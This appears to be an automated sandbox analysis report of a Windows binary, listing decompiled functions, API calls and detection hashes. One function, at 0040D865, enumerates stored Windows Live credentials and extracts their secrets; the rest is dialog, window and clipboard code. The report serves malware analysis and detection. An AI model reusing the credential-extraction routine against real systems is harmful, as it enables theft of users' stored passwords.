                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                  • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                  • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                  • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                  0x0040d86b
                                                  0x0040d86e
                                                  0x0040d878
                                                  0x0040d879
                                                  0x0040d87c
                                                  0x0040d87f
                                                  0x0040d881
                                                  0x0040d886
                                                  0x0040d88a
                                                  0x0040d88c
                                                  0x0040d88c
                                                  0x0040d895
                                                  0x0040d899
                                                  0x0040d8a4
                                                  0x0040d9e7
                                                  0x0040d9f6
                                                  0x0040d9f6
                                                  0x0040d8ae
                                                  0x0040d8b2
                                                  0x0040d8b6
                                                  0x0040d8ca
                                                  0x0040d8ca
                                                  0x0040d8b8
                                                  0x0040d8c4
                                                  0x0040d8c4
                                                  0x0040d8ce
                                                  0x00000000
                                                  0x0040d8d4
                                                  0x0040d8d4
                                                  0x0040d8da
                                                  0x0040d8de
                                                  0x0040d9df
                                                  0x0040d9e3
                                                  0x00000000
                                                  0x0040d8e4
                                                  0x0040d8e9
                                                  0x0040d8ed
                                                  0x0040d8f4
                                                  0x0040d913
                                                  0x0040d917
                                                  0x0040d91c
                                                  0x0040d936
                                                  0x0040d93c
                                                  0x0040d93e
                                                  0x0040d942
                                                  0x0040d947
                                                  0x0040d948
                                                  0x0040d94d
                                                  0x0040d952
                                                  0x0040d964
                                                  0x0040d96d
                                                  0x0040d974
                                                  0x0040d97a
                                                  0x0040d97f
                                                  0x0040d994
                                                  0x0040d99f
                                                  0x0040d99f
                                                  0x0040d9ad
                                                  0x0040d9c6
                                                  0x0040d9c9
                                                  0x0040d9c9
                                                  0x0040d9c9
                                                  0x0040d9af
                                                  0x0040d9af
                                                  0x0040d9be
                                                  0x0040d9c1
                                                  0x0040d9c1
                                                  0x0040d9ad
                                                  0x0040d952
                                                  0x0040d936
                                                  0x0040d9d0
                                                  0x0040d9d5
                                                  0x0040d9d5
                                                  0x00000000
                                                  0x0040d8e9
                                                  0x0040d8de

                                                  APIs
                                                    • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  • memset.MSVCRT ref: 0040D917
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                  • _strnicmp.MSVCRT ref: 0040D948
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                  • API String ID: 945165440-3589380929
                                                  • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                  • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                  • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                  • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407FEB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E004118A0(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L004115B2();
					if(_t26 != 0) {
						E00407EC3(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                  0x00407ff3
                                                  0x0040800b
                                                  0x00408011
                                                  0x0040801c
                                                  0x00408022
                                                  0x0040802f
                                                  0x00408037
                                                  0x0040804f
                                                  0x00408055
                                                  0x00408068
                                                  0x0040806e
                                                  0x00408074
                                                  0x00408079
                                                  0x0040807a
                                                  0x00408083
                                                  0x0040808d
                                                  0x00408093
                                                  0x00408083
                                                  0x0040809b

                                                  APIs
                                                  • memset.MSVCRT ref: 00408011
                                                  • GetDlgCtrlID.USER32 ref: 0040801C
                                                  • GetWindowTextA.USER32 ref: 0040802F
                                                  • memset.MSVCRT ref: 00408055
                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                  • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                    • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 896699463-4169760276
                                                  • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                  • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                  • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                  • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405715, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E0040559F(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405538(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E0040559F(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054C6(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                  0x00405715
                                                  0x0040571b
                                                  0x0040571f
                                                  0x00405725
                                                  0x00405727
                                                  0x0040585b
                                                  0x0040585e
                                                  0x00405867
                                                  0x00405869
                                                  0x0040586c
                                                  0x00405873
                                                  0x00405879
                                                  0x0040586c
                                                  0x0040587a
                                                  0x0040587e
                                                  0x00405850
                                                  0x00405850
                                                  0x00405850
                                                  0x00000000
                                                  0x00405880
                                                  0x00405880
                                                  0x00405883
                                                  0x00000000
                                                  0x00000000
                                                  0x00405885
                                                  0x00405888
                                                  0x0040588f
                                                  0x00405897
                                                  0x0040589a
                                                  0x0040589c
                                                  0x0040589e
                                                  0x004058ed
                                                  0x004058ed
                                                  0x004058f1
                                                  0x00000000
                                                  0x00000000
                                                  0x004058f7
                                                  0x004058fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00405905
                                                  0x00405913
                                                  0x00405921
                                                  0x0040592f
                                                  0x0040594d
                                                  0x00405950
                                                  0x00405956
                                                  0x00405959
                                                  0x00405852
                                                  0x00405858
                                                  0x00405858
                                                  0x004058a0
                                                  0x004058aa
                                                  0x004058b2
                                                  0x004058b4
                                                  0x004058b6
                                                  0x004058ba
                                                  0x004058c2
                                                  0x004058ce
                                                  0x004058dd
                                                  0x004058e8
                                                  0x004058e8
                                                  0x00000000
                                                  0x004058b4
                                                  0x00405891
                                                  0x00405895
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405895
                                                  0x0040587e
                                                  0x0040572d
                                                  0x00405732
                                                  0x00405844
                                                  0x0040584b
                                                  0x00000000
                                                  0x0040584b
                                                  0x00405738
                                                  0x00405739
                                                  0x00000000
                                                  0x00000000
                                                  0x00405742
                                                  0x00405748
                                                  0x00405762
                                                  0x00405765
                                                  0x00000000
                                                  0x00000000
                                                  0x00405771
                                                  0x004057a6
                                                  0x004057b7
                                                  0x004057bf
                                                  0x004057bf
                                                  0x004057ca
                                                  0x004057d2
                                                  0x004057d2
                                                  0x004057dd
                                                  0x004057e8
                                                  0x004057ee
                                                  0x004057f5
                                                  0x00405800
                                                  0x00405806
                                                  0x00405812
                                                  0x00405819
                                                  0x00405819
                                                  0x00405820
                                                  0x00405822
                                                  0x0040582c
                                                  0x0040582c
                                                  0x00405830
                                                  0x00000000
                                                  0x00405830
                                                  0x00405776
                                                  0x00405779
                                                  0x0040577d
                                                  0x004057a0
                                                  0x004057a1
                                                  0x00000000
                                                  0x004057a1
                                                  0x0040577f
                                                  0x00405781
                                                  0x00405786
                                                  0x00405789
                                                  0x00405790
                                                  0x00405795
                                                  0x00405796
                                                  0x0040579b
                                                  0x0040579b
                                                  0x00000000
                                                  0x00405751
                                                  0x00405757
                                                  0x00000000
                                                  0x0040575d
                                                  0x0040575d
                                                  0x00000000
                                                  0x0040575d
                                                  0x00405757

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004057BD
                                                  • GetDlgItem.USER32 ref: 004057D0
                                                  • GetDlgItem.USER32 ref: 004057E5
                                                  • GetDlgItem.USER32 ref: 004057FD
                                                  • EndDialog.USER32(?,00000002), ref: 00405819
                                                  • EndDialog.USER32(?,00000001), ref: 0040582C
                                                    • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                    • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                    • Part of subcall function 004054C6: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405505
                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$DialogMessageSend
                                                  • String ID:
                                                  • API String ID: 2485852401-0
                                                  • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                  • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                  • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                  • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}


















                                                  0x00405960
                                                  0x00405964
                                                  0x00405969
                                                  0x0040596b
                                                  0x0040596e
                                                  0x00405971
                                                  0x00405979
                                                  0x00405981
                                                  0x0040597b
                                                  0x0040597b
                                                  0x0040597d
                                                  0x0040597d
                                                  0x00405983
                                                  0x00405986
                                                  0x00405988
                                                  0x0040598a
                                                  0x0040598c
                                                  0x0040598d
                                                  0x00405993
                                                  0x00405993
                                                  0x00405999
                                                  0x0040599c
                                                  0x004059a6
                                                  0x004059a7
                                                  0x004059aa
                                                  0x004059b3
                                                  0x004059b4
                                                  0x004059c3
                                                  0x004059c5
                                                  0x004059d3
                                                  0x004059d8
                                                  0x004059db
                                                  0x004059e0
                                                  0x004059e7
                                                  0x004059ea
                                                  0x004059f3
                                                  0x004059f4
                                                  0x004059fc
                                                  0x004059ff
                                                  0x00405a01
                                                  0x00405a03
                                                  0x00405a06
                                                  0x00405a0e
                                                  0x00405a11
                                                  0x00405a11
                                                  0x00405a03
                                                  0x00405a14
                                                  0x00405a14
                                                  0x00405a2c
                                                  0x00405a34
                                                  0x00405a41
                                                  0x00405a41
                                                  0x00405a4a
                                                  0x00405a53
                                                  0x00405a55
                                                  0x00405a58
                                                  0x00405a5d
                                                  0x00405a61

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                  • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                  • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                  • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                  0x0040a6a5
                                                  0x0040a6b7
                                                  0x0040a6cd
                                                  0x0040a6df
                                                  0x0040a6e0
                                                  0x0040a6ee
                                                  0x0040a6f9
                                                  0x0040a6fa
                                                  0x0040a709
                                                  0x0040a71a
                                                  0x0040a73a
                                                  0x0040a761
                                                  0x00000000
                                                  0x0040a771
                                                  0x0040a773

                                                  APIs
                                                  • GetClientRect.USER32 ref: 0040A6B7
                                                  • GetWindowRect.USER32 ref: 0040A6CD
                                                  • GetWindowRect.USER32 ref: 0040A6E0
                                                  • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                  • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClient
                                                  • String ID:
                                                  • API String ID: 2126104762-0
                                                  • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                  • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                  • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                  • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                  0x0040606a
                                                  0x0040606f
                                                  0x00406071
                                                  0x00406079
                                                  0x00406084
                                                  0x00406084
                                                  0x00406093
                                                  0x00406097
                                                  0x004060a3
                                                  0x004060ac
                                                  0x004060b5
                                                  0x004060bf
                                                  0x004060c1
                                                  0x004060c1
                                                  0x004060c4
                                                  0x004060c5
                                                  0x004060cf

                                                  APIs
                                                  • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                  • strlen.MSVCRT ref: 0040607E
                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                  • GlobalLock.KERNEL32 ref: 0040609A
                                                  • memcpy.MSVCRT ref: 004060A3
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                  • SetClipboardData.USER32 ref: 004060B5
                                                  • CloseClipboard.USER32 ref: 004060C5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                  • String ID:
                                                  • API String ID: 3116012682-0
                                                  • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                  • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                  • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                  • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
